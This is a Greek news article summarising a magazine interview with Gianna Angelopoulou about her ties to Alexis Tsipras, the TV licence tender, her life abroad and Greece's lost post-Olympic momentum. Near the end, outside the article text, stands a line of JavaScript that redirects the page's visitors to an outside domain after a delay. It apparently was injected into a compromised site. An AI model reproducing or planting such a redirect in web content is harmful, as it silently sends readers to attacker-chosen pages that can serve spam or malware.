Γιάννα Αγγελοπούλου για Τσίπρα: Προσπάθησα να τον βοηθήσω να δει τον «μεγάλο κόσμο στο εξωτερικό»

0
11

 

Στο νέο «Κ» της Καθημερινής της Κυριακής που κυκλοφορεί, εκτάκτως, η Γιάννα Αγγελοπούλου μιλά για τη σχέση της με τον ΣΥΡΙΖΑ και τον πρωθυπουργό Αλέξη Τσίπρα, για τον διαγωνισμό για τις τηλεοπτικές άδειες, γιατί δεν ζει πια μόνιμα στην Ελλάδα, τη Χίλαρι Κλίντον και για το πού σπαταλήθηκε η ολυμπιακή αυτοπεποίθηση μετά το 2004.

%ce%b3%ce%b9%ce%b1%ce%bd%ce%bd%ce%b1-%ce%ba-%ce%ba%ce%b1%ce%b8%ce%b7%ce%bc%ce%b5%cf%81%ce%b9%ce%bd%ce%b7

Παραδέχεται πως αν και ακόμη βρίσκεται συχνά στην Ελλάδα, το κέντρο βάρους της περιουσίας βρίσκεται πλέον στο εξωτερικό. Ωστόσο αρνείται τον όρο της «φορολογικής μετανάστευσης» και προσθέτει ότι φόρους πληρώνει και θα συνεχίσει να πληρώνει:  «Αν ήταν για φορολογικούς λόγους να αποφασίσουμε να μείνουμε εκτός Ελλάδος θα είχε γίνει πριν από καιρό. Ο λόγος που φέραμε τα πάνω κάτω στην οικογένειά μας, ήταν επειδή η «μαμά ήταν στην Αθήνα», είπε. Στην ερώτηση αν δεν ζει στην Αθήνα γιατί δεν μπορεί να είναι χρήσιμη στον τόπο, απαντά: «Κοιτάξτε, είτε είσαι μέσα, είτε είσαι έξω, όσο θέλεις να βοηθήσεις, και σου δίνονται οι δυνατότητες να βοηθήσεις… φυσικά λέω στον εαυτό μου «είσαι εδώ». Οι συνθήκες το έφεραν και δεν μου ζητάνε βοήθεια…»

Για τις πολυσυζητημένες σχέσεις της με τον πρωθυπουργό Αλέξη Τσίπρα και τη στήριξή της στο πρόσωπό του είπε ότι οι συναντήσεις μαζί του έγιναν δημόσια και δεν υπήρχε κρυφή ατζέντα. «Είδα μια απόπειρα καινούργιων ανθρώπων- και νέων, κυρίως όμως καινούργιων- να δουν τα πράγματα αλλιώς σε μια Ελλάδα κουρασμένη. Μίλησα μαζί τους, σημειώστε ότι το έκανα πηγαίνοντας στα γραφεία στη Βουλή αρχικά και αργότερα στο Μαξίμου, το «φως» κάνει καλό σε αυτές τις υποθέσεις. Οπότε θεώρησα ότι θα τους ήταν χρήσιμο, συνέβαλα στο να γίνουν επαφές με το διεθνές σύστημα» απάντησε.

Ωστόσο στη συνέντευξή της απέφυγε να πει εάν και σήμερα συνεχίζει να ομιλεί με τον κ. Τσίπρα σημειώνοντας: «Γνωριζόμαστε. Όπως είπα, ήρθε η στιγμή που αισθάνθηκα ότι έπρεπε να κάνω μια δήλωση, όπως πραγματικά προσπάθησα να τον βοηθήσω να δει τον «μεγάλο κόσμο στο εξωτερικό», ο ίδιος παραδεχόταν ότι δεν είχε την πείρα ακόμα».

Ωστόσο η κα Αγγελοπούλου αφήνει και κάποιες αιχμές σχετικά με τη βραδιά συνάντησης του Αλέξη Τσίπρα και του Μπιλ Κλίντον και χωρίς να αναφέρει το περιστατικό είπε ότι η ίδια δεν θα μπορούσε να μιλήσει με έναν άνθρωπο που σέβεται χωρίς να έχει προετοιμαστεί. Ρωτήθηκε επίσης για το πώς βλέπει τη γνωριμία με τον πρωθυπουργό και τι είδε να προκύπτει μετά από 18 μήνες και είπε:«Κάποιες στιγμές είδα τα πράγματα να παίρνουν δρόμο ολισθηρό και γι’ αυτό αισθάνθηκα υποχρεωμένη να θυμίσω τις θεμελιώδεις αγκυλώσεις που θεωρώ ότι η Ελλάδα δεν είναι νοητό να χάσει, αναφέρομαι στο ευρωπαϊκό της ανήκειν. Από εκεί και πέρα άλλοτε κρύο άλλοτε ζέστη…»

Σχολιάζοντας τις εξελίξεις με τις τηλεοπτικές άδειες, χαρακτηρίζει «άγρια υπόθεση» τον κόσμο των ελληνικών ΜΜΕ και είπε πως «όπως εξελίχθηκαν τα πράγματα δεν ξέρω αν θα προκύψει ένα καλύτερο τηλεοπτικό προϊόν, που είναι το ζητούμενο. Ούτε θα δημιουργηθεί κόσμος αγγέλων…».

Αναφέρθηκε στην κρίση και τη δυναμική, όπως τη χαρακτηρίζει, που απέκτησε η Ελλάδα από τους Ολυμπιακούς Αγώνες, την οποία όμως στην πορεία έχασε: «Το ότι η πολιτική ηγεσία ή μάλλον οι διαδοχικές πολιτικές ηγεσίες της χώρας μας δεν θέλησαν να εμπιστευθούν τους ανθρώπους και τις δυνατότητές τους, έχει, πιστέψτε με, μεγάλο ρόλο στο να χαθεί η δυναμική… Φοβάμαι δε ότι όταν η κρίση κτύπησε ή μάλλον όταν εκδηλώθηκαν οι παθογένειες που επί χρόνια σιγόβραζαν- η γιγάντωση ενός δημοσίου τομέα που ουδείς ενδιαφερόταν να λειτουργήσει αποδοτικά, ενώ μπορούσε (το ξέρω), τα εμπόδια κάθε είδους στην ανάληψη επιχειρηματικής δραστηριότητας, ενώ αυτή είναι έμφυτη στον Ελληνα, η συγκάλυψη των μεγάλων ζητημάτων όπως του Ασφαλιστικού, η κακή και εχθρική συνολικά λειτουργία του κράτους».
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here